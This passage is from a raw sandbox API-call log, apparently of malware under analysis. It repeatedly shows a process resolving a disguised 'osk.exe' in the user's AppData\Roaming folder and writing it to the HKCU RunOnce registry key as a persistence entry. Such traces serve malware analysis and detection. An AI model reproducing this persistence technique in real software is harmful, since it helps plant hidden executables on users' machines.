varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.312] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.312] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.312] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.312] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.312] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.312] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.312] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6c [0082.312] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.312] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6d [0082.313] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.313] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6c [0082.313] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.313] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.313] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.313] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.314] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.314] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.314] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.314] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.314] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.314] RegCloseKey (hKey=0x280) returned 0x0 [0082.314] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.314] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.314] SetTimer (hWnd=0x20280, nIDEvent=0x20e8, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e8 [0082.314] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.327] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.327] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.327] KillTimer (hWnd=0x20280, uIDEvent=0x20e8) returned 1 [0082.327] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.327] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.327] IUnknown:Release (This=0x787518) returned 0x1 [0082.327] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.327] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.328] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.328] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.328] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6d [0082.328] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.328] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6e [0082.328] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.329] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6d [0082.329] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.329] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.329] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.329] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.330] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.330] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.330] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.330] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.330] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.330] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.330] RegCloseKey (hKey=0x280) returned 0x0 [0082.330] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.330] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.330] SetTimer (hWnd=0x20280, nIDEvent=0x20e9, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e9 [0082.330] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.342] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.342] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.342] KillTimer (hWnd=0x20280, uIDEvent=0x20e9) returned 1 [0082.343] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.343] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.343] IUnknown:Release (This=0x787518) returned 0x1 [0082.343] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.343] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.343] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.343] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.343] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.343] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.343] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.343] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.344] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.344] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6e [0082.344] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.344] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6f [0082.344] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.345] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6e [0082.345] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.345] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.345] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.345] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.345] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.345] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.345] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.345] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.345] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.345] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.345] RegCloseKey (hKey=0x280) returned 0x0 [0082.346] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.346] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.346] SetTimer (hWnd=0x20280, nIDEvent=0x20ea, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ea [0082.346] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.358] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.358] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.358] KillTimer (hWnd=0x20280, uIDEvent=0x20ea) returned 1 [0082.359] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.359] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.359] IUnknown:Release (This=0x787518) returned 0x1 [0082.359] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.359] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.359] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 